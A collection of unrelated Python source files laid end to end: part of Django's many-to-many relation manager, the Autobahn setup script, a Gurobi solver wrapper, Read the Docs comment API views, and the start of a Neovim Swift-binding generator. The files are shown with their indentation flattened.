add.alters_data = True
def remove(self, *objs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use remove() on a ManyToManyField which specifies "
"an intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
self._remove_items(self.source_field_name, self.target_field_name, *objs)
remove.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
signals.m2m_changed.send(sender=self.through, action="pre_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
filters = self._build_remove_filters(super(ManyRelatedManager, self).get_queryset().using(db))
self.through._default_manager.using(db).filter(filters).delete()
signals.m2m_changed.send(sender=self.through, action="post_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
clear.alters_data = True
def set(self, objs, **kwargs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs)
else:
old_ids = set(self.using(db).values_list(self.target_field.target_field.attname, flat=True))
new_objs = []
for obj in objs:
fk_val = (self.target_field.get_foreign_related_value(obj)[0]
if isinstance(obj, self.model) else obj)
if fk_val in old_ids:
old_ids.remove(fk_val)
else:
new_objs.append(obj)
self.remove(*old_ids)
self.add(*new_objs)
set.alters_data = True
def create(self, **kwargs):
# This check needs to be done here, since we can't later remove this
# from the method lookup table, as we do with add and remove.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use create() on a ManyToManyField which specifies "
"an intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
db = router.db_for_write(self.instance.__class__, instance=self.instance)
new_obj = super(ManyRelatedManager, self.db_manager(db)).create(**kwargs)
self.add(new_obj)
return new_obj
create.alters_data = True
def get_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = super(ManyRelatedManager, self.db_manager(db)).get_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = super(ManyRelatedManager, self.db_manager(db)).update_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
update_or_create.alters_data = True
def _add_items(self, source_field_name, target_field_name, *objs):
# source_field_name: the PK fieldname in join table for the source object
# target_field_name: the PK fieldname in join table for the target object
# *objs - objects to add. Either object instances, or primary keys of object instances.
# If there aren't any objects, there is nothing to do.
from django.db.models import Model
if objs:
new_ids = set()
for obj in objs:
if isinstance(obj, self.model):
if not router.allow_relation(obj, self.instance):
raise ValueError(
'Cannot add "%r": instance is on database "%s", value is on database "%s"' %
(obj, self.instance._state.db, obj._state.db)
)
fk_val = self.through._meta.get_field(
target_field_name).get_foreign_related_value(obj)[0]
if fk_val is None:
raise ValueError(
'Cannot add "%r": the value for field "%s" is None' %
(obj, target_field_name)
)
new_ids.add(fk_val)
elif isinstance(obj, Model):
raise TypeError(
"'%s' instance expected, got %r" %
(self.model._meta.object_name, obj)
)
else:
new_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
vals = (self.through._default_manager.using(db)
.values_list(target_field_name, flat=True)
.filter(**{
source_field_name: self.related_val[0],
'%s__in' % target_field_name: new_ids,
}))
new_ids = new_ids - set(vals)
with transaction.atomic(using=db, savepoint=False):
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=self.through, action='pre_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
# Add the ones that aren't there already
self.through._default_manager.using(db).bulk_create([
self.through(**{
'%s_id' % source_field_name: self.related_val[0],
'%s_id' % target_field_name: obj_id,
})
for obj_id in new_ids
])
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=self.through, action='post_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
def _remove_items(self, source_field_name, target_field_name, *objs):
# source_field_name: the PK colname in join table for the source object
# target_field_name: the PK colname in join table for the target object
# *objs - objects to remove
if not objs:
return
# Check that all the objects are of the right type
old_ids = set()
for obj in objs:
if isinstance(obj, self.model):
fk_val = self.target_field.get_foreign_related_value(obj)[0]
old_ids.add(fk_val)
else:
old_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
# Send a signal to the other end if need be.
signals.m2m_changed.send(sender=self.through, action="pre_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
target_model_qs = super(ManyRelatedManager, self).get_queryset()
if target_model_qs._has_filters():
old_vals = target_model_qs.using(db).filter(**{
'%s__in' % self.target_field.target_field.attname: old_ids})
else:
old_vals = old_ids
filters = self._build_remove_filters(old_vals)
self.through._default_manager.using(db).filter(filters).delete()
signals.m2m_changed.send(sender=self.through, action="post_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
return ManyRelatedManager
|
|
###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from __future__ import absolute_import
from distutils import log
try:
from ez_setup import use_setuptools
use_setuptools()
except Exception as e:
log.warn("ez_setup failed: {0}".format(e))
finally:
from setuptools import setup
import platform
CPY = platform.python_implementation() == 'CPython'
import sys
PY3 = sys.version_info >= (3,)
PY33 = sys.version_info >= (3,3) and sys.version_info < (3,4)
LONGSDESC = """
Autobahn|Python is a network library implementing
* The WebSocket Protocol
* The Web Application Messaging Protocol (WAMP)
for Twisted and Asyncio on Python 2 and 3.
Autobahn|Python is part of the Autobahn project:
The Autobahn project provides open-source implementations of the
WebSocket and WAMP protocols. WebSocket allows bidirectional real-time
messaging on the Web and WAMP adds asynchronous Remote Procedure Calls
and Publish & Subscribe on top of WebSocket.
More information:
* https://github.com/tavendo/AutobahnPython/blob/master/README.md
* http://autobahn.ws/python
* http://wamp.ws
Source code:
* https://github.com/tavendo/AutobahnPython
"""
## get version string from "autobahn/__init__.py"
## See: http://stackoverflow.com/a/7071358/884770
##
import re
VERSIONFILE="autobahn/__init__.py"
verstrline = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
verstr = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
## Autobahn core packages
##
packages = ['autobahn',
'autobahn.wamp',
'autobahn.websocket',
'autobahn.asyncio',
'autobahn.twisted',
'twisted.plugins',
'autobahn.wamp1', # WAMPv1 - remove this later
]
if PY3:
if PY33:
## "Tulip"
asyncio_packages = ["asyncio>=0.2.1"]
else:
## Python 3.4+ has asyncio builtin
asyncio_packages = []
else:
## backport of asyncio
asyncio_packages = ["trollius>=0.1.2", "futures>=2.1.5"]
## Now install Autobahn ..
##
setup(
name = 'autobahn',
version = verstr,
description = 'Autobahn|Python provides WebSocket and WAMP for Twisted and Asyncio',
long_description = LONGSDESC,
license = 'Apache License 2.0',
author = 'Tavendo GmbH',
author_email = 'autobahnws@googlegroups.com',
url = 'http://autobahn.ws/python',
platforms = ('Any'),
install_requires = ['zope.interface>=4.0.2'],
extras_require = {
## asyncio is needed for Autobahn/asyncio
'asyncio': asyncio_packages,
## you need Twisted for Autobahn/Twisted - obviously
'twisted': ["Twisted>=11.1"],
## native WebSocket and JSON acceleration: this should ONLY be used on CPython
'accelerate': ["wsaccel>=0.6.2", "ujson>=1.33"] if CPY else [],
## for (non-standard) WebSocket compression methods - not needed if you
## only want standard WebSocket compression ("permessage-deflate")
'compress': ["python-snappy>=0.5", "lz4>=0.2.1"],
## needed if you want WAMPv2 binary serialization support
'serialization': ["msgpack-python>=0.4.0"]
},
packages = packages,
zip_safe = False,
## http://pypi.python.org/pypi?%3Aaction=list_classifiers
##
classifiers = ["License :: OSI Approved :: Apache Software License",
"Development Status :: 5 - Production/Stable",
"Environment :: No Input/Output (Daemon)",
"Framework :: Twisted",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python :: Implementation :: Jython",
"Topic :: Internet",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Communications",
"Topic :: System :: Distributed Computing",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Object Brokering"],
keywords = 'autobahn autobahn.ws websocket realtime rfc6455 wamp rpc pubsub twisted asyncio'
)
try:
from twisted.internet import reactor
except:
HAS_TWISTED = False
else:
HAS_TWISTED = True
if HAS_TWISTED:
# Make Twisted regenerate the dropin.cache, if possible. This is necessary
# because in a site-wide install, dropin.cache cannot be rewritten by
# normal users.
try:
from twisted.plugin import IPlugin, getPlugins
list(getPlugins(IPlugin))
except Exception as e:
log.warn("Failed to update Twisted plugin cache: {}".format(e))
else:
log.info("Twisted dropin.cache regenerated.")
## verify that Autobahn Twisted endpoints have been installed
try:
from twisted.internet.interfaces import IStreamServerEndpointStringParser
from twisted.internet.interfaces import IStreamClientEndpointStringParser
has_server_endpoint = False
for plugin in getPlugins(IStreamServerEndpointStringParser):
if plugin.prefix == "autobahn":
has_server_endpoint = True
break
if has_server_endpoint:
log.info("Autobahn Twisted stream server endpoint successfully installed")
else:
log.warn("Autobahn Twisted stream server endpoint installation seems to have failed")
has_client_endpoint = False
for plugin in getPlugins(IStreamClientEndpointStringParser):
if plugin.prefix == "autobahn":
has_client_endpoint = True
break
if has_client_endpoint:
log.info("Autobahn Twisted stream client endpoint successfully installed")
else:
log.warn("Autobahn Twisted stream client endpoint installation seems to have failed")
except:
log.warn("Autobahn Twisted endpoint installation could not be verified")
|
|
import os
import sys
from fractions import Fraction
from gurobipy import *
import tft_expr
import tft_error_form
# ==== global variables ====
VERBOSE = False
# ==== class ====
class GurobiSolver:
solver = None
var_expr_2_gurobi_var = None
n_linear_cons = 0
n_quadratic_cons = 0
opt_obj = None
gurobi_var_2_opt_val = None
def __init__ (self):
self.reset()
def reset (self):
self.solver = gurobipy.Model()
if (not VERBOSE):
self.solver.setParam('OutputFlag',False)
self.var_expr_2_gurobi_var = {}
self.n_linear_cons = 0
self.n_quadratic_cons = 0
self.opt_obj = None
self.gurobi_var_2_opt_val = {}
def getNewLinearConsName (self):
ret = "c" + str(self.n_linear_cons)
self.n_linear_cons = self.n_linear_cons + 1
return ret
def getNewQuadraticConsName (self):
ret = "qc" + str(self.n_quadratic_cons)
self.n_quadratic_cons = self.n_quadratic_cons + 1
return ret
def convertExpr (self, expr):
assert(isinstance(expr, tft_expr.Expr))
if (isinstance(expr, tft_expr.ConstantExpr)):
return float(expr.toCString())
elif (isinstance(expr, tft_expr.VariableExpr)):
if (expr not in self.var_expr_2_gurobi_var):
print ("???? " + str(expr))
assert(expr in self.var_expr_2_gurobi_var)
return self.var_expr_2_gurobi_var[expr]
elif (isinstance(expr, tft_expr.BinaryExpr)):
tasks = []
tasks.append(["left", expr.operator.label, expr.lhs(), expr.rhs()])
convert_rel = None
while (True):
this_task = tasks[len(tasks)-1]
assert(len(this_task) == 4)
assert(this_task[0] in ["left", "right", "combine"])
assert(this_task[1] in ["+", "-", "*", "/"])
tasks = tasks[0:len(tasks)-1]
if (this_task[0] == "combine"):
c_rel = None
if (this_task[1] == "+"):
c_rel = this_task[2] + this_task[3]
elif (this_task[1] == "-"):
c_rel = this_task[2] - this_task[3]
elif (this_task[1] == "*"):
c_rel = this_task[2] * this_task[3]
elif (this_task[1] == "/"):
c_rel = this_task[2] / this_task[3]
else:
sys.exit("ERROR: not supported operation for gurobi")
assert(c_rel is not None)
if (len(tasks) == 0):
convert_rel = c_rel
break
last_task = tasks[len(tasks)-1]
if (last_task[0] == "combine"):
sys.exit("ERROR: invalid consequent combines...")
elif (last_task[0] == "left"):
tasks[len(tasks)-1] = ["right", last_task[1], c_rel, last_task[3]]
elif (last_task[0] == "right"):
tasks[len(tasks)-1] = ["combine", last_task[1], last_task[2], c_rel]
else:
sys.exit("ERROR: invalid action of task...")
elif (this_task[0] == "left"):
if (isinstance(this_task[2], tft_expr.ConstantExpr) or isinstance(this_task[2], tft_expr.VariableExpr)):
tasks.append(["right", this_task[1], self.convertExpr(this_task[2]), this_task[3]])
elif (isinstance(this_task[2], tft_expr.BinaryExpr)):
tasks.append(this_task)
tasks.append(["left", this_task[2].operator.label, this_task[2].lhs(), this_task[2].rhs()])
else:
assert(False), "Not supported expr. type for Gurobi..."
elif (this_task[0] == "right"):
if (isinstance(this_task[3], tft_expr.ConstantExpr) or isinstance(this_task[3], tft_expr.VariableExpr)):
tasks.append(["combine", this_task[1], this_task[2], self.convertExpr(this_task[3])])
elif (isinstance(this_task[3], tft_expr.BinaryExpr)):
tasks.append(this_task)
tasks.append(["left", this_task[3].operator.label, this_task[3].lhs(), this_task[3].rhs()])
else:
assert("ERROR: not supported expr. type...")
else:
assert("ERROR: not supported expr. type...")
assert(len(tasks) == 0)
assert(convert_rel is not None)
return convert_rel
else:
sys.exit("ERROR: invalid expr. type for convertExpr...")
def getVar (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
assert(ve in self.var_expr_2_gurobi_var.keys())
return self.var_expr_2_gurobi_var[ve]
def addVar (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
if (ve.label().startswith(tft_expr.GROUP_ERR_VAR_PREFIX) or ve.label().startswith(tft_expr.ERR_VAR_PREFIX)):
assert(ve.type() == int)
if (ve in self.var_expr_2_gurobi_var.keys()):
return
# add variable
var = ""
if (ve.type() == int):
var = self.solver.addVar(vtype=GRB.INTEGER, name=ve.label())
elif (ve.type() == Fraction):
var = self.solver.addVar(name=ve.label())
else:
sys.exit("ERROR: invalid type of VariableExpr found when asking gurobi for OptimizeExpr")
self.var_expr_2_gurobi_var[ve] = var
self.solver.update()
# write range
if (ve.hasBounds()):
# check lower bound
if (ve.lb().value() < Fraction(0, 1)):
sys.exit("ERROR: variable's (" + ve.label() +") lower bound must be greater than 0")
# add constraint
self.addConstraint("linear", "<=", ve.lb(), ve)
self.addConstraint("linear", "<=", ve, ve.ub())
def addConstraint (self, ctype, comp, lhs_expr, rhs_expr):
assert(ctype == "linear" or ctype == "quadratic")
assert(comp == "==" or comp == "<=" or comp == ">=")
assert(isinstance(lhs_expr, tft_expr.Expr))
assert(isinstance(rhs_expr, tft_expr.Expr))
lhs = self.convertExpr(lhs_expr)
rhs = self.convertExpr(rhs_expr)
func_adder = ""
func_namer = ""
if (ctype == "linear"):
func_adder = self.solver.addConstr
func_namer = self.getNewLinearConsName
elif (ctype == "quadratic"):
func_adder = self.solver.addQConstr
func_namer = self.getNewQuadraticConsName
else:
sys.exit("ERROR: invalid cons. type")
if (comp == "=="):
func_adder(lhs == rhs, func_namer())
elif (comp == "<"):
func_adder(lhs < rhs, func_namer())
elif (comp == "<="):
func_adder(lhs <= rhs, func_namer())
elif (comp == ">"):
func_adder(lhs > rhs, func_namer())
elif (comp == ">="):
func_adder(lhs >= rhs, func_namer())
else:
sys.exit("ERROR: invalid comparator")
# set optimization objective
def setOptObj (self, obj_expr, opt_dir):
assert(opt_dir == "max" or opt_dir == "min")
assert(isinstance(obj_expr, tft_expr.Expr))
self.opt_obj = 0 + self.convertExpr(obj_expr)
if (opt_dir == "max"):
self.solver.setObjective(self.opt_obj, GRB.MAXIMIZE)
elif (opt_dir == "min"):
self.solver.setObjective(self.opt_obj, GRB.MINIMIZE)
else:
sys.exit("ERROR: invalid opt. direction...")
def goOpt (self):
assert(not isinstance(self.opt_obj, str))
self.solver.optimize()
opt_rel = self.solver.getAttr("Status")
# get opt. value
opt_val = None
if (opt_rel == GRB.OPTIMAL):
if (VERBOSE):
print ("-- got opt. solution --")
opt_val = self.opt_obj.getValue()
assert(type(opt_val) is float)
else:
self.solver.setParam("DualReductions", 0)
self.solver.optimize()
if (VERBOSE):
if (opt_rel == GRB.INFEASIBLE):
print ("-- infeasible... --")
elif (opt_rel == GRB.INF_OR_UNBD):
print ("-- infeasible or unbounded... --")
elif (opt_rel == GRB.UNBOUNDED):
print ("-- unbounded... --")
else:
print ("-- ?? solution status... --")
return None
if (VERBOSE):
print ("---- opt. report ----")
print ('optized obj: %g' % opt_val)
print ("---------------------")
# get var. values
if (VERBOSE):
print ("---- var. values ----")
for v in self.solver.getVars():
var = self.solver.getVarByName(v.varName)
self.gurobi_var_2_opt_val[var] = Fraction(v.x)
if (VERBOSE):
print ('var. : %s = %g' % (v.varName, v.x))
if (VERBOSE):
print ("---------------------")
# return
return Fraction(opt_val)
def getOptVarValue (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
if (ve in self.var_expr_2_gurobi_var.keys()):
if (self.var_expr_2_gurobi_var[ve] in self.gurobi_var_2_opt_val.keys()):
return self.gurobi_var_2_opt_val[self.var_expr_2_gurobi_var[ve]]
else:
return None
else:
return None
|
|
import json
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.decorators import method_decorator
from rest_framework import permissions, status
from rest_framework.decorators import (
api_view,
authentication_classes,
permission_classes,
renderer_classes,
detail_route
)
from rest_framework.exceptions import ParseError
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import JSONRenderer, JSONPRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from rest_framework.serializers import ModelSerializer, Serializer
from rest_framework.viewsets import ModelViewSet
from sphinx.websupport import WebSupport
from readthedocs.comments.models import (
DocumentComment, DocumentNode, NodeSnapshot, DocumentCommentSerializer,
DocumentNodeSerializer, ModerationActionSerializer)
from readthedocs.privacy.backend import AdminNotAuthorized
from readthedocs.projects.models import Project
from readthedocs.restapi.permissions import IsOwner, CommentModeratorOrReadOnly
from .backend import DjangoStorage
from .session import UnsafeSessionAuthentication
storage = DjangoStorage()
support = WebSupport(
srcdir='/Users/eric/projects/readthedocs.org/docs',
builddir='/Users/eric/projects/readthedocs.org/docs/_build/websupport',
datadir='/Users/eric/projects/readthedocs.org/docs/_build/websupport/data',
storage=storage,
docroot='websupport',
)
########
# called by javascript
########
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
@renderer_classes((JSONRenderer, JSONPRenderer, BrowsableAPIRenderer))
def get_options(request):
base_opts = support.base_comment_opts
base_opts['addCommentURL'] = '/api/v2/comments/'
base_opts['getCommentsURL'] = '/api/v2/comments/'
return Response(base_opts)
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
@renderer_classes((JSONRenderer, JSONPRenderer, BrowsableAPIRenderer))
def get_metadata(request):
"""
Check for get_metadata
GET: page
"""
document = request.GET.get('page', '')
return Response(storage.get_metadata(docname=document))
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer, JSONPRenderer))
def attach_comment(request):
comment_id = request.POST.get('comment', '')
comment = DocumentComment.objects.get(pk=comment_id)
node_id = request.POST.get('node', '')
snapshot = NodeSnapshot.objects.get(hash=node_id)
comment.node = snapshot.node
serialized_comment = DocumentCommentSerializer(comment)
return Response(serialized_comment.data)
#######
# Normal Views
#######
def build(request):
support.build()
def serve_file(request, file):
document = support.get_document(file)
return render_to_response('doc.html',
{'document': document},
context_instance=RequestContext(request))
######
# Called by Builder
######
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
def has_node(request):
"""
Checks to see if a node exists.
GET: node_id - The node's ID to check
"""
node_id = request.GET.get('node_id', '')
exists = storage.has_node(node_id)
return Response({'exists': exists})
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer,))
def add_node(request):
post_data = request.DATA
project = Project.objects.get(slug=post_data['project'])
page = post_data.get('document', '')
node_hash = post_data.get('id', '')
version = post_data.get('version', '')
commit = post_data.get('commit', '')
project.add_node(node_hash, page, version=version, commit=commit)
return Response()
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer,))
def update_node(request):
post_data = request.DATA
try:
old_hash = post_data['old_hash']
new_hash = post_data['new_hash']
commit = post_data['commit']
project = post_data['project']
version = post_data['version']
page = post_data['page']
node = DocumentNode.objects.from_hash(
node_hash=old_hash, project_slug=project, version_slug=version,
page=page)
node.update_hash(new_hash, commit)
return Response(DocumentNodeSerializer(node).data)
except KeyError:
return Response("You must include new_hash and commit in POST payload to this view.",
status.HTTP_400_BAD_REQUEST)
class CommentViewSet(ModelViewSet):
serializer_class = DocumentCommentSerializer
permission_classes = [CommentModeratorOrReadOnly, permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
qp = self.request.QUERY_PARAMS
if qp.get('node'):
try:
node = DocumentNode.objects.from_hash(version_slug=qp['version'],
page=qp['document_page'],
node_hash=qp['node'],
project_slug=qp['project'])
queryset = DocumentComment.objects.filter(node=node)
except KeyError:
raise ParseError(
'To get comments by node, you must also provide page, '
'version, and project.')
except DocumentNode.DoesNotExist:
queryset = DocumentComment.objects.none()
elif qp.get('project'):
queryset = DocumentComment.objects.filter(node__project__slug=qp['project'])
else:
queryset = DocumentComment.objects.all()
return queryset
@method_decorator(login_required)
def create(self, request):
project = Project.objects.get(slug=request.data['project'])
comment = project.add_comment(version_slug=request.data['version'],
page=request.data['document_page'],
hash=request.data['node'],
commit=request.data['commit'],
user=request.user,
text=request.data['text'])
serializer = self.get_serializer(comment)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
@detail_route(methods=['put'])
def moderate(self, request, pk):
comment = self.get_object()
decision = request.DATA['decision']
moderation_action = comment.moderate(request.user, decision)
return Response(ModerationActionSerializer(moderation_action).data)
|
|
#!/usr/bin/env python3
import subprocess
import msgpack
from string import Template
import re
import textwrap
import os
import io
void_func_template = Template('''\
public func ${func_name}(${args}
expectsReturnValue: Bool = false
) -> Completable {
let params: [RxNeovimApi.Value] = [
${params}
]
if expectsReturnValue {
return self
.checkBlocked(
self.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: expectsReturnValue)
)
.asCompletable()
}
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: expectsReturnValue)
.asCompletable()
}
''')
get_mode_func_template = Template('''\
public func ${func_name}(${args}
) -> Single<${result_type}> {
let params: [RxNeovimApi.Value] = [
${params}
]
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
.map { value in
guard let result = (${return_value}) else {
throw RxNeovimApi.Error.conversion(type: ${result_type}.self)
}
return result
}
}
''')
func_template = Template('''\
public func ${func_name}(${args}
errWhenBlocked: Bool = true
) -> Single<${result_type}> {
let params: [RxNeovimApi.Value] = [
${params}
]
func transform(_ value: Value) throws -> ${result_type} {
guard let result = (${return_value}) else {
throw RxNeovimApi.Error.conversion(type: ${result_type}.self)
}
return result
}
if errWhenBlocked {
return self
.checkBlocked(
self.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
)
.map(transform)
}
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
.map(transform)
}
''')
extension_template = Template('''\
// Auto generated for nvim version ${version}.
// See bin/generate_api_methods.py
import Foundation
import MessagePack
import RxSwift
extension RxNeovimApi {
public enum Error: Swift.Error {
${error_types}
case exception(message: String)
case validation(message: String)
case blocked
case conversion(type: Any.Type)
case unknown
init(_ value: RxNeovimApi.Value?) {
let array = value?.arrayValue
guard array?.count == 2 else {
self = .unknown
return
}
guard let rawValue = array?[0].uint64Value, let message = array?[1].stringValue else {
self = .unknown
return
}
switch rawValue {
${error_cases}
default: self = .unknown
}
}
}
}
extension RxNeovimApi {
$body
}
extension RxNeovimApi.Buffer {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${buffer_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
extension RxNeovimApi.Window {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${window_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
extension RxNeovimApi.Tabpage {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${tabpage_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
fileprivate func msgPackDictToSwift(_ dict: Dictionary<RxNeovimApi.Value, RxNeovimApi.Value>?) -> Dictionary<String, RxNeovimApi.Value>? {
return dict?.compactMapToDict { k, v in
guard let strKey = k.stringValue else {
return nil
}
return (strKey, v)
}
}
fileprivate func msgPackArrayDictToSwift(_ array: [RxNeovimApi.Value]?) -> [Dictionary<String, RxNeovimApi.Value>]? {
return array?
.compactMap { v in v.dictionaryValue }
.compactMap { d in msgPackDictToSwift(d) }
}
extension Dictionary {
fileprivate func mapToDict<K, V>(_ transform: ((key: Key, value: Value)) throws -> (K, V)) rethrows -> Dictionary<K, V> {
let array = try self.map(transform)
return tuplesToDict(array)
}
fileprivate func compactMapToDict<K, V>(_ transform: ((key: Key, value: Value)) throws -> (K, V)?) rethrows -> Dictionary<K, V> {
let array = try self.compactMap(transform)
return tuplesToDict(array)
}
fileprivate func tuplesToDict<K:Hashable, V, S:Sequence>(_ sequence: S)
-> Dictionary<K, V> where S.Iterator.Element == (K, V) {
var result = Dictionary<K, V>(minimumCapacity: sequence.underestimatedCount)
for (key, value) in sequence {
result[key] = value
}
return result
}
}
''')
def snake_to_camel(snake_str):
components = snake_str.split('_')
return components[0] + "".join(x.title() for x in components[1:])
def nvim_type_to_swift(nvim_type):
if nvim_type == 'Boolean':
return 'Bool'
if nvim_type == 'Integer':
return 'Int'
if nvim_type == 'Float':
return nvim_type
if nvim_type == 'void':
return 'Void'
if nvim_type == 'String':
return 'String'
if nvim_type == 'Array':
return 'RxNeovimApi.Value'
if nvim_type == 'Dictionary':
return 'Dictionary<String, RxNeovimApi.Value>'
if nvim_type == 'Buffer':
return 'RxNeovimApi.Buffer'
if nvim_type == 'Window':
return 'RxNeovimApi.Window'
if nvim_type == 'Tabpage':
return 'RxNeovimApi.Tabpage'
if nvim_type == 'Object':
return 'RxNeovimApi.Value'
if nvim_type.startswith('ArrayOf('):
match = re.match(r'ArrayOf\((.*?)(?:, \d+)*\)', nvim_type)
return '[{}]'.format(nvim_type_to_swift(match.group(1)))
return 'RxNeovimApi.Value'
def msgpack_to_swift(msgpack_value_name, type):
if type == 'Bool':
return f'{msgpack_value_name}.boolValue'
if type == 'Int':
return f'({msgpack_value_name}.int64Value == nil ? nil : Int({msgpack_value_name}.int64Value!))'
if type == 'Float':
return f'{msgpack_value_name}.floatValue'
if type == 'Void':
return f'()'
if type == 'String':
return f'{msgpack_value_name}.stringValue'
if type == 'RxNeovimApi.Value':
return f'Optional({msgpack_value_name})'
if type in 'RxNeovimApi.Buffer':
return f'RxNeovimApi.Buffer({msgpack_value_name})'
if type in 'RxNeovimApi.Window':
return f'RxNeovimApi.Window({msgpack_value_name})'
if type in 'RxNeovimApi.Tabpage':
return f'RxNeovimApi.Tabpage({msgpack_value_name})'
if type.startswith('Dictionary<'):
return f'msgPackDictToSwift({msgpack_value_name}.dictionaryValue)'
if type.startswith('[Dictionary<'):
return f'msgPackArrayDictToSwift({msgpack_value_name}.arrayValue)'
if type.startswith('['):
element_type = re.match(r'\[(.*)\]', type).group(1)
return f'{msgpack_value_name}.arrayValue?.compactMap({{ v in {msgpack_to_swift("v", element_type)} }})'
return 'RxNeovimApi.Value'
def swift_to_msgpack_value(name, type):
if type == 'Bool':
return f'.bool({name})'
if type == 'Int':
return f'.int(Int64({name}))'
if type == 'Float':
return f'.float({name})'
if type == 'Void':
return f'.nil()'
if type == 'String':
return f'.string({name})'
if type == 'Dictionary<String, RxNeovimApi.Value>':
return f'.map({name}.mapToDict({{ (Value.string($0), $1) }}))'
if type == 'RxNeovimApi.Value':
return name
if type in ['RxNeovimApi.Buffer', 'RxNeovimApi.Window', 'RxNeovimApi.Tabpage']:
return f'.int(Int64({name}.handle))'
if type.startswith('['):
match = re.match(r'\[(.*)\]', type)
test = '$0'
return f'.array({name}.map {{ {swift_to_msgpack_value(test, match.group(1))} }})'
def parse_args(raw_params):
types = [nvim_type_to_swift(p[0]) for p in raw_params]
